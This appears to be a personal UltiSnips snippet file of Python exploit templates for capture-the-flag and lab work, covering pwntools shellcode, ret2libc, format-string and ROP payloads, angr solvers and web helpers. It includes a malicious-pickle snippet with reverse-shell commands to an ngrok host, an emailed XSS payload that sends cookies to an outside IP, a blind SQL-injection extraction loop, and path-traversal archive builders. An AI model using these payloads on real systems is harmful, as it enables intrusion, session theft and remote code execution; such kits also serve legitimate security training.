snippet lj
	${1:string}.ljust(${2:1337}, '${3:A}')

snippet regex
	if (match := re.search(r'${0:Needle: (.*)}', ${1:haystack})):
		found = unpack(match.group(1))

snippet bf "generic bruteforce loop, no multithreading"
	from itertools import product
	import string
	import re
	import sys
	#import hashlib

	alphabet = string.printable #string.ascii_letters

	for i in range(1, 10):
		for curr in product(alphabet, repeat = i):
			guess = ''.join(curr)
			#if hashlib.md5(guess) == "aaaaaaaaaaaa":
				print guess
				sys.exit(0)
	

## PWNTOOLS ##

snippet pimp "pwn imports"
	from pwn import *



# modded from https://github.com/minight/dotfiles/blob/master/config/nvim/UltiSnips/python.snippets
snippet pwn "general pwntools template"
	from pwn import *
	#context.log_level = 'debug'
	
	log.info("Iniciando el hackeo.")

	remoteflag = 0
	IP = 'midsem.6447.sec.edu.au'
	PORT = 8011
	FILENAME = "./${1:pwnme}"
	if remoteflag:
		io = remote(IP, PORT)
	else:
		io = process(FILENAME) # for more args, make a list [FILENAME, a, b, ...]
	
	elf = context.binary = ELF(FILENAME)
	# Dump symbols
	import json
	print json.dumps({k:hex(v) for k,v in elf.symbols.items()}, indent=4, sort_keys=True)
	# radare can probably pull out more, this just shows you what pwntools can see

	payload = ''
	#payload += cyclic(100)
	#payload += pack(0x41414141)
	
	io.sendline(payload)
	io.interactive()
	#print io.recvall()

snippet wrap "debugging function wrapper stolen from albntomat0"
	#use by putting the @wrap decorator above any function
	def wrap(f):
		@wraps(f)
		def wrapped_f(*args, **kwargs):
			log.info('Called: ' + f.__name__ + repr(args))
			return f(*args, **kwargs)
		return wrapped_f
snippet sc "shellcode payload"
	shellcode = asm(shellcraft.${1:i386 | amd64}.linux.sh())

# enhex(foo) is equivalent to foo.encode('hex')
snippet scv "shellcode payload with verbose debugging output"
	shellcode = asm(shellcraft.${1:i386 | amd64}.linux.sh())
	log.info(enhex(shellcode))
	log.info(repr(shellcode))
	log.hexdump(shellcode)
	log.info(shellcraft.$1.linux.sh())

snippet sc3 "shellcode payload for 32 bit"
	shellcode = asm(shellcraft.i386.linux.sh())

snippet sc6 "shellcode payload for 64 bit"
	shellcode = asm(shellcraft.amd64.linux.sh())

snippet asm "because custom shellcode is sometimes necessary"
	shellcode = asm("""
							nop
					""", arch='${1:i386 | amd64}')

# inspired by my scv snippet
snippet wtf "dump a string in various forms"
	wtf = ${1:payload}
	log.info(enhex(wtf))
	log.info(repr(wtf))
	log.hexdump(wtf)

# sample use case: you leak an address/canary, but you want to visually inspect the bytes
# you really should know this by now, but it's easy to forget/doubt yourself when panicking
# pack converts hex (eg 0x41414141) into chars (pack(0x41414141) == "AAAA"), unpack does the opposite
snippet strtohex "convert string of raw bytes to hexstring (eg 0xdeadbeef)"
	hex(unpack(${1:data}, 'all'))

snippet hexstrtoint "convert hexstring (ie a string, not a number) to an int"
	int(${1:data}, 16)

# modded from https://github.com/Naetw/CTF-pwn-tips#find-binsh-or-sh-in-library
# Note: you'll have to find the base yourself
# For a local binary without aslr, you can do sth like this:
# ./asdf & sleep 0.01; pwnme=`pidof ./asdf`; cat /proc/$pwnme/maps; kill -9 $pwnme
# Else you'll need to leak a libc addr (eg. via puts/write or fsb) or use bestforce (if on 32 bit)
# HOWEVER, if the binary is statically linked (ie there is no libc code) then you need ROP
snippet ret2libc "prepping ret2libc payload fodder"

	libc = ELF('${2:libc.so}')
	base = libc_leak - libc.sym.${1:leakedfnname}

	sys = base + libc.sym.system
	env = base + libc.sym.environ #this is a ptr to a stack ptr
	sh = base + next(libc.search('sh\x00'))
	binsh = base + next(libc.search('/bin/sh\x00'))

snippet putsleak "using puts to leak a libc address. main is default ret addr"
	putsleak = flat(elf.sym.puts, ${0:elf.sym.main}, elf.got.printf)

# https://github.com/tnballo/notebook/wiki/Pwntools-Snippets#generate-a-format-string-exploit-for-arbitrary-write
# Uses a linear search for the offset, so might not be great if the offset is very large, but otherwise this is M A G I C
# TODO: tweak this snippet to work for format1
snippet fmt "automatic fsb exploit generation"
	VAL_TO_WRITE = ${1:elf.sym.win}
	ADDR = ${2:elf.got.printf}

	# Edit this depending on program output
	def till_fmt(payload, io):
		io.sendline(payload)
		#io.recvuntil('')

	def exec_fmt(payload):
		if remoteflag:
			io = remote(IP, PORT)
		else:
			io = process(FILENAME) # for more args, make a list [FILENAME, a, b, ...]

		till_fmt(payload, io)
		return io.recvall() # io.recvuntil('', drop=True)

	# Construct payload
	context.clear(arch = 'i386') 
	# full list: docs.pwntools.com/en/stable/context.html#pwnlib.context.ContextType.architectures
	payload = fmtstr_payload(FmtStr(exec_fmt).offset, 
									{ADDR: VAL_TO_WRITE}, 
									numbwritten=0, 
									write_size='byte')

# 64 bit variant of the above which frontloads the format specifiers
# explanation: https://advancedpersistentjest.com/2016/12/30/writeup-espr-pdfmaker-33c3-part-1-of-2/
# pwntools frontloads the addresses instead of the format specifiers
# so instead we'll use https://github.com/Inndy/formatstring-exploit
snippet fmt6
	VAL_TO_WRITE = ${1:elf.sym.win}
	ADDR = ${2:elf.got.printf}

	# Edit this depending on program output
	def till_fmt(payload, io):
		io.sendline(payload)
		#io.recvuntil('')

	def exec_fmt(payload):
		if remoteflag:
			io = remote(IP, PORT)
		else:
			io = process(FILENAME) # for more args, make a list [FILENAME, a, b, ...]

		till_fmt(payload, io)
		return io.recvall() # io.recvuntil('', drop=True)

	fmt = FormatString(offset=FmtStr(exec_fmt).offset, written=0, bits=64)
	fmt[ADDR] = VAL_TO_WRITE
	payload, sig = fmt.build()

#snippet rop "https://github.com/ctfhacker/ctf-writeups/blob/master/campctf-2015/bitterman-pwn-400/README.md"
#	from pwn import *
#
#	elf = ELF('./${1:vuln_binary}')
#	rop = ROP(elf)
#
#	rop.puts(elf.got['puts'])
#	rop.call(elf.symbols['main'])
#
#	print rop.dump()
#

snippet ropp "64 bit rop utility functions"
	#ret = pack(

	def pop_rdi(arg):
		 gadget_addr = 0
		 return flat(gadget_addr, arg)#, 'JUNKRAT!') #add more junk args if needed
	def pop_rsi(arg):
		 gadget_addr = 0
		 return flat(gadget_addr, arg)#, 'JUNKRAT!') #add more junk args if needed
	def pop_rdx(arg):
		 gadget_addr = 0
		 return flat(gadget_addr, arg)#, 'JUNKRAT!') #add more junk args if needed
	def pop_rcx(arg):
		 gadget_addr = 0
		 return flat(gadget_addr, arg)#, 'JUNKRAT!') #add more junk args if needed

	def ropcall(targetFunction, args=[]):
		 return ''.join(pop(args[i]) for i, pop in enumerate([pop_rdi, pop_rsi, pop_rdx, pop_rcx][:len(args)])) + pack(targetFunction)


# https://bytesoverbombs.io/quickie-pwntools-414bb89ef83f
snippet rop "rop template. This one doesn't use the rop module"
	from pwn import *

	# Create the ELF object
	elf = ELF("${1:callme32}")

	# Find the memory addresses for relevant functions and pack them
	${2:callme_one}   = p32(elf.symbols["$2"])
	${3:callme_two}   = p32(elf.symbols["$3"])
	${4:callme_three} = p32(elf.symbols["$4"])

	# Pack the address for the gadget we plan to leverage
	poppoppop    = p32(${5:0x0804beef})

	# Pack the arguments for the functions we want to call
	args         = p32(1) + p32(2) + p32(3)

	# Build the payload
	payload = "A" * 44
	payload += $2 + poppoppop + args
	payload += $3 + poppoppop + args
	payload += $4 + poppoppop + args
	# Execute our application with our buffer overflow string
	io = elf.process()
	io.sendline(payload)
	io.interactive()

# UPDATE: I don't actually use these two anymore, I find using elf.got.foo and elf.sym.bar directly far more convenient
# Reasons you might do this: PLT & GOT are fixed, so you can use it to call libc functions without knowing where libc starts in the binary
# note: .symbols['got.foo'] == .got['foo'] == .got.foo
snippet gota "get address of an entry in the GOT"
	#target_binary = ELF('./${1:vuln_binary}')
	${2:funcname}_got_addr = target_binary.got['$2']
	#$2_got_val = unpack(target_binary.read($2_got_addr, 4))

snippet funa "get address of a function, eg system()"
	#target_binary = ELF('./${1:vuln_binary}')
	${2:funcname}_addr = target_binary.symbols['$2']

# Can be used to quickly calculate bof lengths without static analysis
# However, I've since made a zsh alias that rolls both of these (cyc,cyf) into one command
snippet cyc "generate cyclic(de Bruijn) sequence"
	cyclic(${1:100}, n=4)

snippet cyf "given a subsequence from cyclic, calculate the offset"
	cyclic_find(${1:0xdeadbeef})

snippet ln
	log.info(${0:msg})

snippet lx
	log.hexdump(${0:msg})

snippet ls
	log.success(${0:msg})

snippet lw
	log.warn(${0:msg})

snippet lc
	log.critical(${0:msg})

snippet snl
	io.sendline(${0:payload})

snippet recvloop "untested lol"
	shitCount = ${0:8}
	shits = [None for x in range(0, shitCount)] #maybe this line isn't necessary
	for i,v in enumerate(shits):
		shits[i] = io.recvline()

snippet gdb
	if not remoteflag:
		gdb.attach(io)

# modded from https://github.com/tnballo/notebook/wiki/Pwntools-Snippets
# and https://youtu.be/gWU2yOu0COk?t=1m
# The second source separates out the gdbscript into a separate line (which I did not do here)
# WARNING: both of these are likely to interfere with io, gdb.attach(io) is the safest option
# They will also not work on a remote host
# Consider context.log_level = 'debug' as an alternative
snippet gdbm "gdb, break on main"
	if not remoteflag:
		gdb.attach(io, '''
			break *{}
			continue
			'''.format(elf.symbols['main']),
			# ^this assumes that a symbol called 'main' exists
			gdb_args=['-q'])

snippet gdbe "gdb, break on entry point. Requires pwndbg"
	if not remoteflag:
		gdb.attach(io, '''
			entry
			continue
			''',
			gdb_args=['-q'])


snippet dump "Coredump: has useful info incl. esp and eip at segfault"
	#assuming 32 bit
	core = Coredump('./core')                                              
	print hex(core.eip) 
	print cyclic_find(core.eip) #offset is at: 
	print hex(core.esp) #only useful if ASLR is off

snippet fump "As above, but 32/64 bit independent. Specifically for bof"
	#elf = context.binary = ELF(FILENAME)
	core = Coredump('./core')                                              
	print hex(core.fault_addr)
	print hex(u32(pack(core.fault_addr)[:4]))        
	print cyclic_find(u32(pack(core.fault_addr)[:4]))

# Pwntools already includes a hexdump function, you don't really need this
## hexdump a string, stolen from:
## https://github.com/Inndy/formatstring-exploit#usage
#snippet hexdump
#	def dump(x):
#		try:
#			from hexdump import hexdump
#			hexdump(x)
#		except ImportError:
#			import binascii, textwrap
#			print('\n'.join(textwrap.wrap(binascii.hexlify(x),32)))

## Z3 ##

# modded from https://www.youtube.com/watch?v=b92CW-NZ3l0
snippet math "2+2 is 4, minus 1 that's 3 quick í´¥mathsí´¥"
	from z3 import *

	s = Solver()

	# Rules or some shit
	# eg. solve for x
	x = BitVec('x', 64)
	s.add(${1: Insert maths, eg. x * b == c})

	# Print model
	if s.check() == sat:
		m = s.model()
		print m
		#print hex(int(str(m[x]))) #can also use sexpr() but it's ugly
		#print p64(int(str(m[x]))) #needs pwntools

## ANGR ##

snippet angr
	import angr
	import claripy
	import sys

	p = angr.Project('./${1:binary_name}',  load_options={"auto_load_libs": False})

	# You can replace these with concrete values if you already know them
	# Sizes are measured in bits, and are upper bounds
	arg1 = claripy.BVS('lolfuk', 8 * 40)

	# Generate initial state
	#st = p.factory.entry_state(args=['./$1', arg1])
	st = p.factory.entry_state(stdin=arg1)
	#st = p.factory.blank_state(addr=0x400c6c)
	#st.memory.store(0xffffffff, arg1)
	#st.regs.rdi = 0xffffffff

	# Create a path group and explore it
	pg = p.factory.simgr(st)
	pg.explore(find=lambda lol: b"WIN" in lol.posix.dumps(1))
	#pg.explore(find=[0x400e93], avoid=[])

	print("pg = {}".format(pg))
	if (len(pg.found) > 0):
		 s = pg.found[0]
		 print("Found a solution:")
		 # Find concrete values that satisfy the constraints
		 print("arg1 = {} ".format(repr(s.solver.eval(arg1, cast_to=bytes))))
		 print(s.posix.dumps(0).split(b'\0')[0]) # this tends to work for simpler challs
	else:
	 	 print("fuckkkkkkk")


#	import angr
#
#	def main():
#		p = angr.Project('./${1:binary_name}', load_options={"auto_load_libs": False})
#		pg = p.factory.path_group()
#
#		pg.explore(find=(${2:0x31333337},), avoid=(${3:0xdeadbeef},${4:0x8badf00d},))
#
#		found = pg.found[0]
#		return found.state.posix.dumps(0).split('\0')[0]
#
#	if __name__ == '__main__':
#		print(main())

snippet angrop 
	import angr
	import angrop

	p = angr.Project("./${1:binary_name}")
	rop = p.analyses.ROP()
	rop.find_gadgets()

	# Choose your weapon:
	chain = rop.set_regs(rax=0x1337, rbx=0x56565656)
	#chain = rop.write_to_mem(0x61b100, "/bin/sh\0")
	#chain = rop.func_call("read", [0, 0x804f000, 0x100])
	#chain = rop.add_to_mem(0x804f124, 0x41414141)

	chain.print_payload_code()

snippet arg "quick and dirty, no argparse"
	import sys
	${1:foo}, ${2:bar} = sys.argv[1:]

snippet proc
	import subprocess
	proc = subprocess.run(["${1:cmd}", "${2:arg1}"], stdout=subprocess.PIPE)
	if proc.returncode:
		raise
	print(proc.stdout)

snippet overwrite
	allow_overwrite = "";
	if os.path.isfile(filename := "${1:./foo.js}"):
		 allow_overwrite = input(f"{filename} already exists. Overwrite? (Y/n)\n")
	if allow_overwrite.lower() != "n":
		 log.warn("Writing to {filename}");
		 with open(filename, "w") as f:
			  f.write(${2:"asdf"});

snippet fw "file write"
	if not os.path.exists((subdir := ${1:"foo"})):
		os.makedirs(subdir)
	with open((filename := f"{subdir}/${2:bar.txt}"), 'w') as f:  # wb to write bytes
		f.write(${3:"asdf"})

snippet fileit "iterate through file"
	with open("foo.txt", "r") as f:
		for line in f:
			$0

snippet stb "string to bytestring (b-string)"
	str.encode(${0:"asdf"})

snippet bts "bytestring to string"
	str(${0:b"asdf"}, 'utf-8')

snippet b64
	from base64 import b64encode as b64e, b64decode as b64d

snippet unpickle "b64-encoded pickle to object"
	import pickle
	from base64 import b64encode as b64e, b64decode as b64d
	unpickled = pickle.loads(b64d(${0:'gA=='}))

snippet pickle "object to b64 encoded pickle"
	import pickle
	from base64 import b64encode as b64e, b64decode as b64d
	pickled = str(b64e(pickle.dumps(${0:object}, protocol=3)), 'utf-8')

snippet badpickle "evil pickle"
	class Evil():
		 def __reduce__(_):
			  import os
			  return (os.system, ("sleep 2",))  # probe: expected response time ~2s if successful
			  #return (os.system,("netcat -c '/bin/bash -i' -l -p 1234",))  # execute, then nc victim 1234
			  #return (os.system,("/bin/bash -c 'bash -i > /dev/tcp/4.tcp.ngrok.io/10302 0>&1'",))  # nc -lvp 1234, then execute
	evil = str(b64e(pickle.dumps(Evil(), protocol=3)), 'utf-8')  # downgrade protocol for py2 ðŸ¥’

snippet bg "Usage: put @bg above any func defn"
	def bg(f):
		def wrapped(*args, **kwargs):
			import asyncio, concurrent.futures
			return asyncio.get_event_loop().run_in_executor(concurrent.futures.ThreadPoolExecutor(max_workers=100), f, *args, *kwargs)
		return wrapped

snippet loop "async loop, use if bottleneck is io AND you need to use the results"
	import asyncio, concurrent.futures
	def bg(f):
		def wrapped(*args, **kwargs):
			return asyncio.get_event_loop().run_in_executor(concurrent.futures.ThreadPoolExecutor(max_workers=100), f, *args, *kwargs)
		return wrapped

	async def main():
		@bg
		def ${1:action}(i):
			response = sesh.get(url)
			return response

		tasks = []
		${2:items} = []
		for i in $2:
			tasks.append($1(i))
		results = await asyncio.gather(*tasks)
		return results

	results = asyncio.run(main())
	print(results)

snippet abf "async bestforce"
	import asyncio, concurrent.futures
	def bg(f):
		def wrapped(*args, **kwargs):
			return asyncio.get_event_loop().run_in_executor(concurrent.futures.ThreadPoolExecutor(max_workers=100), f, *args, *kwargs)
		return wrapped

	async def main():
		@bg
		def probe(char, url, data, method: str = 'GET'):
			url, data = (x.replace("FUZZ", char) for x in (url, data))
			log.info(f"Probe: {data}")
			response = sesh.request(method, url, params=parse_qs(data))  # use params, data, or json
			size = len(response.content)
			log.debug(f"Received response, size: {size}")
			return char if size > 2229 else None

		tasks = []
		import string
		alphabet = string.printable.replace("%", "")#.replace("_", "")
		for i in alphabet:
			payload = f"{prefix}FUZZ%}}'"
			tasks.append(probe(i, url, payload))
		results = await asyncio.gather(*tasks)
		return results

	prefix = "id=1 OR (select content from flag5) like 'HTB{"
	while (results := [x for x in asyncio.run(main()) if x]):
		log.info(results)
		prefix += results[0]
	log.info(prefix)

#TODO: make snippets for web
snippet wpn "generic Web PwN snippet"
	import logging as log  # so i can reuse pwnlib.log snippets
	DEFAULT_LOGLEVEL = log.INFO
	log.basicConfig(level=DEFAULT_LOGLEVEL, format="[%(levelname)s][%(filename)s:%(lineno)s - %(funcName)s()] %(message)s")
	[log.addLevelName(l, f"{s}\033[1;0m") for l,s in {log.INFO: "\033[0;34m*", log.WARNING: "\033[1;33m!", log.ERROR: "\033[0;41mERROR", log.CRITICAL: "\033[0;41mCRITICAL"}.items()]

	import requests
	requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

	sesh = requests.Session()
	from http.cookies import BaseCookie
	sesh.cookies = requests.utils.cookiejar_from_dict({k:m.value for k,m in BaseCookie('').items()})
	sesh.headers = requests.utils.default_headers()
	#sesh.proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
	if not sesh.proxies: log.warn("Proxying off.")
	sesh.verify = False
	sesh.mount('http://', requests.adapters.HTTPAdapter(pool_maxsize=100))

	url = "${1:https://}"
	from urllib.parse import parse_qs
	payload = parse_qs('')
	log.info("Iniciando el hackeo.")
	response = sesh.get(url, params=payload)
	#response = sesh.post(url, ${2:data|json}=payload)

	log.info(f"Response code: {response.status_code}")
	#response.raise_for_status()
	log.info(f"Response text:\n{response.text}")
	#log.info(f"Response json:\n{response.json}")
	log.info("End of response.")

snippet post
	#import requests
	url = "${1:https://}"
	body = {} 
	#cookies = {} # or use requests.Session()
	response = requests.post(url, ${2:data|json}=body) #, cookies=cookies)
	print(response.status_code)
	#response.raise_for_status()
	#print(response.text)
	#print(response.json())

snippet get
	#import requests
	url = "${1:https://}"
	#payload = {}
	#cookies = {} # or use requests.Session()
	response = requests.get(url) #, params=payload, cookies=cookies)
	print(response.status_code)
	#response.raise_for_status()
	#print(response.text)
	#print(response.json())

snippet prep "useful for ../, based on stackoverflow.com/a/63422105"
	(prep := requests.Request('GET',':').prepare()).url = url
	response = sesh.send(prep)

snippet connect "for connecting to a direct remote shell on victim nc server, sans pwntools&retry"
	from telnetlib import Telnet
	for i in range(3):
		try:
			with Telnet('${0:172.16.103.142}', ${1:1234}) as t:
			log.info("ðŸ§¦ Connection established")
			t.interact()
			log.info("ðŸ§¦ Closing connection")
			break
		except ConnectionRefusedError:
			log.warn("ðŸ§¦ Connection failed, retrying...")
			import time
			time.sleep(1)

snippet mail
	import logging as log  # so i can reuse pwnlib.log snippets
	log.basicConfig(level=log.INFO, format="[%(levelname)s][%(filename)s:%(lineno)s - %(funcName)s()] %(message)s")
	[log.addLevelName(l, f"{s}\033[1;0m") for l,s in {log.INFO: "\033[0;34m*", log.WARNING: "\033[1;33m!", log.ERROR: "\033[0;41mERROR", log.CRITICAL: "\033[0;41mCRITICAL"}.items()]

	import smtplib

	def sendMail(payload):
		 sender = "attacker@offsec.local"
		 recipient = "admin@offsec.local"
		 date = payload
		 subject = "AAAAAAAAAAA"
		 body = "BBBBBBBBBBB"
		 msg = f"""From: {sender}
	To: {recipient}
	Date: {date}
	Subject: {subject}
	Content-type: text/html

	{body}\r\n\r\n"""

		 from smtplib import SMTP
		 with SMTP("atmail") as smtp:
			  #smtp.login(username,password)
			  log.info("Sending email...")
			  smtp.sendmail(sender, recipient, msg)
			  log.info("Email sent!")

	sendMail("<script>document.location='http://192.168.119.137:1337/'+document.cookie</script>")

snippet fetch
	function log(response) {
		if (!response.ok) throw Error(response.statusText);
		else response.text().then(data => {
			console.log(\`Request to ${response.url} returned content:\n${data}\`);
		});
		return response;
	}
	
	fetch("${1:http://httpstat.us}", {
	}).then((r1) => {
		log(r1);
	})

snippet mash "everything onto one line, useful for js perhaps"
	str.replace(r"""
	<script>
	console.log('foo\nbar');
	</script>
	""", '\n', '')

snippet zip "dir traversal zip"
	import zipfile
	from cStringIO import StringIO

	f = StringIO()
	with zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED) as z:
		z.writestr('../../../../../tmp/poc/poc.txt', 'gottem')
	with open('poc.zip', 'wb') as zip:
		zip.write(f.getvalue())

snippet tgz "dir traversal tgz"
	import tarfile
	import StringIO

	with tarfile.Tarfile("poc.tgz","w:gz") as tar:
		string = StringIO.StringIO("gottem")
		info = tarfile.TarInfo(name="../../../../../tmp/poc/poc.txt")
		info.size = len(string.buf)
		tar.addfile(tarinfo=info, fileobj=string)

